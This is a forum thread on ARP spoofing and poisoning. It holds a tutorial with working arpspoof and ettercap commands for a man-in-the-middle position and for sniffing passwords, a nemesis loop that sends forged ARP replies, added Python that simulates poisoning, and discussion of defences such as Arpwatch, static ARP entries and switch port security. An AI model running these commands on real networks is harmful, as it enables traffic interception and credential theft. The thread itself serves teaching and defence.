

Irongeek
August 5th, 2004, 03:05 PM
The Basics of Arpspoofing/Arppoisoning

ARP stands for Address Resolution Protocol and it allows the network to translate IP addresses into MAC addresses. Basically, ARP works like this: When one host using IP on a LAN is trying to contact another it needs the MAC address (aka: hardware address) of the host it is trying to contact. It first looks in its ARP cache (to see your ARP cache in Windows type "arp -a" at the command line) to see if it already has the MAC address, but if not it broadcasts out an ARP request asking "Yo, who has this IP address I'm looking for?" If the host that has that IP address hears the ARP query it will respond with its own MAC address and a conversation can begin using IP.

In common bus networks like Ethernet using a hub or 802.11b, all traffic can be seen by all hosts whose NICs are in promiscuous mode, but things are a bit different on switched networks. A switch looks at the data sent to it and tries to forward packets only to their intended recipient based on MAC address. Switched networks are more secure and help speed up the network by only sending packets where they need to go. There are ways around switches though ;). Using a program like Arpspoof, Ettercap or Cain we can lie to other machines on the local area network and tell them we have the IP they are looking for, thus funneling their traffic through us.

http://irongeek.com/images/mim.png

The image above helps illustrate how arpspoofing/arppoisoning works. Basically, the Cracker is telling Alan's box that he has the IP that corresponds to Brian's box and vice versa. By doing this the Cracker receives all network traffic going between Alan and Brian. Once you have Arpspoofed your way between two machines you can sniff the connection with whatever tool you like (TCPDump, Ethereal, Ngrep, etc.). By arpspoofing between a machine and the LAN's gateway you can see all the traffic it's sending out to the Internet. In this tutorial I'm only giving the basics of how to use these tools; look at their specific man pages and documentation for a plethora of more advanced options.



Dsniff Tools (arpspoof)

Let's start with using Dug Song's Arpspoof program that comes with his Dsniff ( http://www.monkey.org/~dugsong/dsniff/ ) package. I'll be using the *nix version but if you look around you may be able to find a Win32 version. The first thing we should do is make sure packet forwarding is turned on, otherwise our machine will drop all traffic between the hosts we are trying to sniff, causing a denial of service. Some of the tools I'll show do this for you automatically, but to be sure you may want to do it yourself. Use the following commands, depending on operating system:

Linux:

echo 1 > /proc/sys/net/ipv4/ip_forward

BSD:

sysctl -w net.inet.ip.forwarding=1

Now that our box will forward the traffic we can start Arpspoofing. Let's assume I want to sniff all traffic between a host and the gateway so I can see the traffic it's sending to the Internet. To get traffic in both directions I would use the following two commands:

arpspoof -t 192.168.1.1 192.168.1.2 >/dev/null 2>&1 &
arpspoof -t 192.168.1.2 192.168.1.1 >/dev/null 2>&1 &

The ">/dev/null 2>&1 &" part is there to make it easier to run both from one terminal, but you may want to omit it for debugging purposes. Now we can use any package we wish to sniff the connection. To start with I'd recommend using the sniffer dsniff that comes along with arpspoof to sniff for plaintext passwords. To look at all sorts of other traffic I would recommend TCPDump or Ethereal. When you are ready to stop arpspoofing issue the following command.

killall arpspoof

This should kill the two instances of arpspoof started above.


Ettercap

Another package you may want to look into is Ettercap ( http://ettercap.sourceforge.net/ ). It's sort of the Swiss army knife of Arpspoofing and password sniffing. I usually use it in non-interactive mode, but by default it has an ncurses interface. Here's a quick example of how to sniff for passwords in non-interactive mode between two machines.

ettercap -NaC 192.168.1.1 192.168.1.2

The "N" option makes it non-interactive, the "a" option tells it to arppoison and the "C" tells it to parse out passwords and usernames. Ettercap and Dsniff are both great tools for sniffing passwords on protocols that send them in plaintext (telnet, SMTP, HTTP, etc.). A nice thing about Ettercap is that it will proxy some connections like SSL and allow you to sniff traffic that is usually encrypted; the victim will get a warning message about the certificate, but many folks just click past such things without reading them. If you want to use Ettercap just to arpspoof so you can use another sniffing tool, look in the man page for the "-J" option.

Cain

For you Windows users, look into using Cain ( http://www.oxid.it/cain.html ). It has some great functionality. I have a video tutorial on how to use it here: http://www.irongeek.com/i.php?page=videos/cain1

If you like pretty GUIs, Cain is the way to go. It does not have as many options as Ettercap, but it's still pretty cool and has some other Windows specific extras built in.



Further research:

Protecting yourself from arpspoofing
Static ARP tables
ARPWatch ( http://www-nrg.ee.lbl.gov/ )

Also see my article on how to change your MAC address (http://irongeek.com/i.php?page=security/changemac)
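An added example, not code from Irongeek's tutorial or from the dsniff package: the Python below builds the two forged ARP replies that the pair of arpspoof commands above send (sender = the IP being impersonated, sender hardware address = the attacker's MAC, unicast to the target), parses them back the way a sniffer would, and applies them to a simulated ARP cache on each victim so you can see what "arp -a" reports before and after poisoning. The gateway, victim and attacker MACs are made up for the demo, and the cache model assumes a stack that accepts unsolicited replies and overwrites its existing entry.

```python
"""Forged ARP replies as arpspoof sends them, plus a toy ARP cache.
Added example; all addresses and MACs are constructed sample values."""
import ipaddress
import struct

ETH_P_ARP = 0x0806            # EtherType for ARP
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_ip: str, sender_mac: str,
                    target_ip: str, target_mac: str) -> bytes:
    """42-byte Ethernet frame carrying 'sender_ip is-at sender_mac',
    unicast to target_mac. 'arpspoof -t <target> <host>' sends this with
    sender_ip = <host> and sender_mac = the attacker's own MAC."""
    eth_hdr = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp_hdr = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # Ethernet / IPv4
    body = (mac_bytes(sender_mac) + ipaddress.IPv4Address(sender_ip).packed
            + mac_bytes(target_mac) + ipaddress.IPv4Address(target_ip).packed)
    return eth_hdr + arp_hdr + body


def parse_arp(frame: bytes) -> dict:
    """Decode the fields a sniffer or an ARP cache cares about."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol type")
    return {
        "op": op,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": str(ipaddress.IPv4Address(frame[28:32])),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": str(ipaddress.IPv4Address(frame[38:42])),
    }


def apply_reply(cache: dict, reply: dict) -> None:
    """Model of a stack that accepts an unsolicited reply and overwrites the
    existing entry; that behaviour is what makes poisoning work."""
    if reply["op"] == ARP_REPLY:
        cache[reply["sender_ip"]] = reply["sender_mac"]


def poison_demo():
    """Replay the two tutorial commands:
         arpspoof -t 192.168.1.1 192.168.1.2   (lie to the gateway)
         arpspoof -t 192.168.1.2 192.168.1.1   (lie to the victim)
    Returns (caches before, caches after) as (gateway_cache, victim_cache)."""
    gateway_ip, gateway_mac = "192.168.1.1", "00:11:22:33:44:01"   # made up
    victim_ip, victim_mac = "192.168.1.2", "00:11:22:33:44:02"     # made up
    attacker_mac = "00:11:22:33:44:03"                             # made up

    gateway_cache = {victim_ip: victim_mac}      # what 'arp -a' shows before
    victim_cache = {gateway_ip: gateway_mac}
    before = (dict(gateway_cache), dict(victim_cache))

    to_gateway = build_arp_reply(victim_ip, attacker_mac, gateway_ip, gateway_mac)
    to_victim = build_arp_reply(gateway_ip, attacker_mac, victim_ip, victim_mac)
    apply_reply(gateway_cache, parse_arp(to_gateway))
    apply_reply(victim_cache, parse_arp(to_victim))
    return before, (gateway_cache, victim_cache)


if __name__ == "__main__":
    before, after = poison_demo()
    print("before:", before)
    print("after: ", after)
```

After the two replies, both caches resolve the other party to the attacker's MAC, so every frame between gateway and victim is physically delivered to the attacker's NIC; with IP forwarding off (the denial of service the tutorial warns about) they go no further. Real arpspoof repeats the reply every couple of seconds because cache entries time out and the genuine host keeps answering requests.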

el-half
August 5th, 2004, 03:36 PM
Nice, but I think you should have explained more what the ARP protocol exactly is.
Someone who doesn't know about arp and arp poisoning will not completely understand what he/she is doing when poisoning an arp cache. I like the way you write though, this is an excellent effort.

AngelicKnight
August 5th, 2004, 04:06 PM
Someone who doesn't know about arp and arp poisoning will not completely understand what he/she is doing when poisoning an arp cache.

*raises hand* Yeah, and I'd be one of those people! Care to add some enlightenment on that? This is something I would really like to pick up on.

And by the way, it's really good to see a really knowledgeable "newbie" getting as involved as you are. This is the kinda stuff we need!

Irongeek
August 5th, 2004, 04:34 PM
Point taken guys. I’m just glad to have found a forum where intelligent questions are asked and answered and I don’t have to sift through 200 “How do I hack” posts.

I just added the following section in blue to the tutorial; let me know if it helps:
Basically, ARP works like this: When one host using IP on a LAN is trying to contact another it needs the MAC address (aka: hardware address) of the host it is trying to contact. It first looks in its ARP cache (to see your ARP cache in Windows type "arp -a" at the command line) to see if it already has the MAC address, but if not it broadcasts out an ARP request asking "Yo, who has this IP address I'm looking for?" If the host that has that IP address hears the ARP query it will respond with its own MAC address and a conversation can begin using IP.

MsMittens
August 5th, 2004, 05:52 PM
Irongeek, might want to update the section on Ettercap. The NG version has a GTK on it (you need to specify which interface to use). Unfortunately the NG version seems rather buggy as of late (I'm hoping they stabilize it soon) so people might want to play with the last 0.6.9b (?) version.

mrg81
August 5th, 2004, 09:16 PM
hi,

Great tutorial. He might just want to post screen shots of what happens when he types in arp -a before spoofing and what happens after spoofing. Also, if possible, the screen shot where you can see what the victim is doing when he has been arp spoofed. I don't mean the steps here, just the screen shots.

MRG.

mil
August 16th, 2004, 10:03 AM
Great tutorial! :)

thehorse13
August 16th, 2004, 11:39 AM
You have a very solid tutorial here but if I may make a suggestion or two for future writings…

Many people write tutorials with the assumption that the audience is competent. This is never the case. When you give advice on how to enable packet forwarding or ARP spoof a network segment, you may want to go over the dangers of what can happen and/or post a DO NOT do list. There are many dangerous things that can happen when you do these things. The first being that you can take down an entire enterprise if you start routing all packets through a Pentium II machine instead of the beefy router your company put in place to handle the traffic.

In this particular tut, you explained how to enable packet forwarding yet you didn’t explain if the commands you issued are static after reboot or terminate when the app exits. This is a baaaaaaaaaad thing. Although the more savvy folks know the answer to this, they are not your audience. I would advise people to use a tool like FRAGROUTER to setup packet forwarding because even if you forget to stop it from forwarding, it is not a static app, meaning that after reboot it will not start up packet forwarding again.

I come from the school of thought which dictates that you understand completely what you are doing and the effects should something go wrong. This is why I like to post advisories in my tutorials as to minimize the surprise factor when something doesn't perform as expected.

Do I make any sense? If not, take a peek at some of my HPING or NMAP tuts.

Excellent effort.

--TH13

Tiger Shark
August 16th, 2004, 01:32 PM
Good tutorial....

One teeny little thing along the lines Hoss mentioned regarding the audience.....

What tells your computer whether to use ARP for machines on the local network or to route the packets to the default gateway is the subnet mask assigned to the computer. If the target address doesn't pass the rule laid down in the subnet mask then the computer is remote and the packets should be routed via the gateway. If the target address passes the rule then the target computer is considered "local" and an ARP request should be made.

You kinda made it sound like I can make an ARP request anywhere and many might miss the LAN reference you made.

Irongeek
August 16th, 2004, 02:30 PM
Thanks for all the feedback folks, I'll keep it in mind for the next tutorial I write.

Travish
August 16th, 2004, 04:13 PM
I have a quick question on this matter: I have a local network consisting of a proxy server to the internet, a w2k box and a Linux box. The three boxes are connected using a layer 2 (hw address) switch.

I spoofed the MAC address of the Linux box using ifconfig to the MAC address of the w2k box. So in the ARP tables of the proxy, both the Linux and the w2k box have the same MAC address. However, when I run tcpdump on the Linux box, and I start surfing the net using the w2k box, I do not see the packets of the w2k box on the Linux box, despite them both having the same MAC address.

How is this possible? Does the switch only forward packets to 1 port and refuse 2?

It got me puzzled. I expected to see the w2k packets on the Linux machine after the spoof.

Irongeek
August 16th, 2004, 10:29 PM
Honestly, I’m not quite sure of the intricacies of the software/circuitry built into a switch. Has the Linux box sent any traffic to the network so the switch can notice its MAC address? Any other ideas guys?

Tiger Shark
August 16th, 2004, 10:34 PM
What does the ARP table on the switch say about the MAC addresses? After all, the way you described it, it will be the final arbiter.

chsh
August 16th, 2004, 11:27 PM
Irongeek,
It's a very nice basic tutorial. However I would like to have seen a "securing your network" section that could mention how to employ certain technologies to secure your network against ARP-based attacks. Also, some mention of non-MITM attacks using ARP might be handy (such as a network-wide DoS), as well as how to prevent them. Maybe a second tutorial that might mention these things, if you have any interest?

phishphreek
August 17th, 2004, 12:05 AM
Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=260643#post781762) by Tiger Shark
What does the ARP table on the switch say about the MAC addresses? After all, the way you described it, it will be the final arbiter.

That's what I thought... but then I got to thinking... can you even look at the MAC table of a layer 2 switch? All of the layer two switches I have are not managed and I can't see the table. The ones that are managed are layer 2 and layer 3....

Maybe you just have to wait for the switch to update its table?

Irongeek
August 17th, 2004, 04:47 AM
Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=260643#post781780) by chsh
Irongeek,
It's a very nice basic tutorial. However I would like to have seen a "securing your network" section that could mention how to employ certain technologies to secure your network against ARP-based attacks. Also, some mention of non-MITM attacks using ARP might be handy (such as a network-wide DoS), as well as how to prevent them. Maybe a second tutorial that might mention these things, if you have any interest?

I would be interested in writing such a tutorial, but doubt I have the resources to do it justice. I know of a few ways ARP spoofing can be used for DoS (like spoofing the gateway and turning off packet forwarding, or assuming the MAC address of an antenna in an Axon system) and I have ideas for possible solutions, but I don't have the privileges on my network to really test them to make sure the fixes work.

Travish
August 17th, 2004, 07:33 AM
Well, the Linux box was sending packets too. After the MAC spoof, both machines behaved as before. I'm sure the Linux MAC was spoofed, because when I looked at the ARP table on the router, it listed the 2 IP addresses (one of the Linux box, the other one of the w2k box) both with the same MAC address. I just don't understand that if a switch's "routing table" is based on the MAC address it is still able to work properly when it has 2 MAC addresses that are the same. The only explanation could be that the switch somehow got hold of the real MAC address. So my spoofing was not effective.

Anyway, much thanks on the replies, and thanks for the great tutorial :)!

Shrekkie
August 17th, 2004, 10:04 AM
Travish,

the switch doesn't have two IP addresses in its ARP table, it just updated the MAC address with the IP address from the victim to the attacker's IP address, so you will cut off the victim in this example.
Now if you'd try a man-in-the-middle attack (in this example sit between the switch and the victim), with let's say ettercap, you'd poison in two directions, thus in the ARP table of the switch you'd see the victim's IP address with the attacker's MAC address, and the other way around in the victim's ARP table. In this example the victim would still be able to communicate and surf, while you read what he's doing with e.g. tcpdump or another sniffer.

Anyway try ettercap for the mitm-attack, and this to see the difference :

#!/bin/bash
# Send one forged ARP reply per second, 1000 times:
# "<victim-ip> is-at <attacker-mac>", addressed to <switch-ip>.
# -r makes nemesis send an ARP reply instead of a request.

counter=0

while [ "$counter" -lt 1000 ]; do
    sleep 1
    nemesis arp -S <victim-ip> -D <switch-ip> -m <attacker-mac> -r
    counter=$((counter + 1))
done


This is a very simple script to temporarily poison a switch, but which would create a victim cut-off. The -r is crucial because it tells it it's an ARP reply.
If you tcpdump then on your attacker box, you'd see all present connections originally to the victim's box continuing on the attacker box.
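An added example, not from anyone in this thread: a toy learning switch in Python that shows why two hosts sharing one MAC do not both receive the traffic Travish expected to see. A layer 2 switch keeps a MAC-to-port table and rewrites the entry for a MAC whenever a frame with that source MAC arrives on a different port, so frames addressed to the shared MAC are delivered only to whichever host transmitted most recently, and the two boxes take turns being "cut off". The same model with a per-port list of permitted source MACs shows the port-security rule Travish proposes further down the thread. Port numbers and MACs are made up; the proxy, w2k and Linux roles follow Travish's description.

```python
"""Learning-switch model: MAC table flapping with a cloned MAC, and the
per-port MAC filter that stops it. Added example with constructed data."""


class LearningSwitch:
    def __init__(self, ports, allowed=None):
        self.ports = list(ports)
        self.allowed = allowed or {}     # port -> set of permitted source MACs
        self.table = {}                  # mac -> port (the switch's MAC/CAM table)
        self.violations = []             # (port, mac) frames refused by port security

    def receive(self, in_port, src_mac, dst_mac):
        """Return the list of ports the frame is forwarded out of."""
        if in_port in self.allowed and src_mac not in self.allowed[in_port]:
            self.violations.append((in_port, src_mac))
            return []                    # port security: drop it, learn nothing
        self.table[src_mac] = in_port    # learn, or overwrite, the source port
        out_port = self.table.get(dst_mac)
        if out_port is None:
            return [p for p in self.ports if p != in_port]   # unknown dst: flood
        if out_port == in_port:
            return []                    # destination is behind the same port
        return [out_port]


PROXY = "00:aa:00:00:00:01"              # made up
W2K = "00:aa:00:00:00:02"                # made up
LINUX = W2K                              # the Linux box has cloned the w2k MAC
LINUX_REAL = "00:aa:00:00:00:03"         # its real MAC, used for port security


def travish_scenario():
    """Ports: 1 = proxy, 2 = w2k, 3 = linux (cloned MAC). Each entry is
    (description, ports the frame was delivered to)."""
    sw = LearningSwitch(ports=[1, 2, 3])
    return [
        ("w2k -> proxy", sw.receive(2, W2K, PROXY)),      # proxy unknown: flood
        ("proxy -> w2k", sw.receive(1, PROXY, W2K)),      # MAC learned on port 2
        ("linux -> proxy", sw.receive(3, LINUX, PROXY)),  # entry rewritten to port 3
        ("proxy -> w2k", sw.receive(1, PROXY, W2K)),      # now lands on linux only
        ("w2k -> proxy", sw.receive(2, W2K, PROXY)),      # w2k talks, entry flips back
        ("proxy -> w2k", sw.receive(1, PROXY, W2K)),      # back to w2k, linux sees nothing
    ]


def port_security_scenario():
    """Same hosts, but ports 2 and 3 only accept their assigned MAC."""
    sw = LearningSwitch(ports=[1, 2, 3], allowed={2: {W2K}, 3: {LINUX_REAL}})
    log = [
        ("w2k -> proxy", sw.receive(2, W2K, PROXY)),
        ("linux(cloned) -> proxy", sw.receive(3, LINUX, PROXY)),  # refused
        ("proxy -> w2k", sw.receive(1, PROXY, W2K)),              # still port 2
    ]
    return log, sw.violations


if __name__ == "__main__":
    for desc, out in travish_scenario():
        print(f"{desc:24s} -> ports {out}")
    log, violations = port_security_scenario()
    print("with port security:", log, "violations:", violations)
```

The first flooded frame is the one case where the Linux box does see the w2k traffic: the proxy's MAC is not yet in the table, so the frame goes everywhere. Once the table is populated, delivery follows the last port that sourced the cloned MAC, which is why a passive tcpdump on the Linux box stays quiet while the w2k box is busy. With the per-port filter in place the cloned frame is dropped before it can rewrite the table, and a real managed switch would typically also log the violation or shut the port.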

Travish
August 17th, 2004, 10:20 AM
Hey Shrekkie,

Thx for the reply. I think indeed my problem is I don't understand what's happening in the switch. Anyway, for the moment, the victim is not cut off, even after spoofing. I'll reboot the switch after spoofing; who knows, that may have something to do with it.
After that I'll try the mitm attack, as explained by you and the tutorial. See how that works.

moonlight_x
August 17th, 2004, 10:38 AM
Errrrr guys, would we get flamed for participating in this discussion of doing this illegal stuff?

Tiger Shark
August 17th, 2004, 10:51 AM
Errrrr guys, would we get flamed for participating in this discussion of doing this illegal stuff?

Certainly not.... because it isn't illegal if you own or have permission to do it on the network you are attempting it on. Now, of course, if you were to start talking in specific terms about a network that you don't have authority to do this kind of thing on then, yes, you might receive a little "flak". So I guess it's all a matter of how you word it.... ;)

Shrekkie
August 17th, 2004, 12:26 PM
moonlight_x,

This site is for security-minded people, and as we all know the thin line between these two possible worlds (legal - illegal) is a matter of morals, I guess.
The reason we share this is to educate, help (call it what you want) and to test or use it in safe or trusted environments. If some ass uses these techniques in real-life big networks, he's an even bigger ass than I thought.

I do test too, I do want to learn all about security, I try to learn to hack too, but for me this stays inside my lan. What others do is their problem. ;)

Cheers,

Irongeek
August 17th, 2004, 01:38 PM
How is it illegal? The guy is doing it on his own network to understand how it works.

chsh
August 17th, 2004, 04:16 PM
Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=260643#post781842) by Irongeek
I would be interested in writing such a tutorial, but doubt I have the resources to do it justice. I Know of a few ways ARP spoofing can be used for DoS, (like spoofing the gateway and turning off packet forwarding, or assuming the MAC address of an antenna in an Axon system) and I have ideas for possible solutions, but I don’t have the privileges on my network to really test them to make sure they the fixes work.
This is perhaps why so many tutorial writers here opt to develop tutorials based on how to break (which isn't necessarily security). To my mind it isn't really a security tutorial until you show a person how to stop it from being attacked/broken in this manner. You could at least amend your current tutorial and discuss how to secure it against MITM attacks. I'll give ya a big hint on where to start: All major OSes have built-in capability that would render ARP poisoning/MITM attacks useless.

Irongeek
August 17th, 2004, 04:22 PM
Well, I could think of using static ARP tables, but that would be a bitch to maintain in a decent sized network. You could do it between certain critical boxes however. Using Arpwatch is also handy for spotting when this kind of shenanigans is going on.
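An added example, not Arpwatch's code and not from anyone in the thread: a minimal Arpwatch-style monitor in Python for the two defences Irongeek names above. It is fed the sender IP and sender MAC from ARP replies seen on the wire and raises an alert when an IP's MAC changes ("flip-flop"), when one MAC claims more than one IP (the signature of the gateway-plus-victim poisoning in the tutorial, "mitm"), and when a reply contradicts a pinned static entry of the kind "arp -s" creates ("static-violation"), which the monitor refuses to apply. The sequence of replies and all addresses are constructed sample data.

```python
"""Arpwatch-style IP/MAC binding monitor. Added example; the reply
sequence and the addresses below are constructed, not captured."""
from collections import defaultdict


class ArpMonitor:
    def __init__(self, static=None):
        # static: {ip: mac} entries pinned like 'arp -s'; never overwritten
        self.static = {ip: mac.lower() for ip, mac in (static or {}).items()}
        self.bindings = dict(self.static)     # ip -> mac currently believed
        self.claims = defaultdict(set)        # mac -> every ip it has claimed
        for ip, mac in self.bindings.items():
            self.claims[mac].add(ip)

    def observe(self, sender_ip, sender_mac):
        """Feed the sender fields of one ARP reply; return alerts raised."""
        mac = sender_mac.lower()
        alerts = []
        old = self.bindings.get(sender_ip)
        if old != mac:
            if sender_ip in self.static:
                alerts.append(("static-violation", sender_ip, old, mac))
            else:
                if old is not None:
                    alerts.append(("flip-flop", sender_ip, old, mac))
                self.bindings[sender_ip] = mac
        if sender_ip not in self.claims[mac]:
            self.claims[mac].add(sender_ip)
            if len(self.claims[mac]) > 1:
                alerts.append(("mitm", mac, tuple(sorted(self.claims[mac]))))
        return alerts


GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "00:11:22:33:44:01"   # made up
VICTIM_IP, VICTIM_MAC = "192.168.1.2", "00:11:22:33:44:02"     # made up
ATTACKER_MAC = "00:11:22:33:44:03"                             # made up

# Constructed sequence of ARP replies: normal traffic, then the lies the
# tutorial's two arpspoof commands send, one of them repeated.
SAMPLE_REPLIES = [
    (GATEWAY_IP, GATEWAY_MAC),
    (VICTIM_IP, VICTIM_MAC),
    (GATEWAY_IP, ATTACKER_MAC),   # arpspoof -t 192.168.1.2 192.168.1.1
    (VICTIM_IP, ATTACKER_MAC),    # arpspoof -t 192.168.1.1 192.168.1.2
    (GATEWAY_IP, ATTACKER_MAC),   # repeated, as arpspoof does every few seconds
]


def run_sample(static=None):
    """Run the constructed replies through a monitor, optionally with the
    gateway pinned as a static entry. Returns (alerts, final bindings)."""
    mon = ArpMonitor(static=static)
    alerts = []
    for ip, mac in SAMPLE_REPLIES:
        alerts.extend(mon.observe(ip, mac))
    return alerts, mon.bindings


if __name__ == "__main__":
    for a in run_sample()[0]:
        print("no static entry :", a)
    for a in run_sample(static={GATEWAY_IP: GATEWAY_MAC})[0]:
        print("gateway pinned  :", a)
```

Two caveats a practitioner would want. First, the "mitm" rule also fires for a router or server that legitimately owns several addresses on the segment, so known multi-homed MACs need an allow list. Second, arpspoof sends its forged replies as unicast frames to the victim, so on a switched LAN a monitor on an ordinary port only sees broadcasts and its own traffic; to catch the attack it needs a mirror/SPAN port, or it has to run on the hosts it is protecting.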

Travish
August 18th, 2004, 07:33 AM
If you have a decent programmable switch, you could set up rules so a certain port on the switch only allows packets of a certain MAC address. If you don't often move computers on your network, I think this could be a protection against mitma. It requires some bookkeeping of the port-MAC address tables, but like I said, if you don't move your clients too much, it's not a big deal. If you want to do mitma you would have to hack the switch.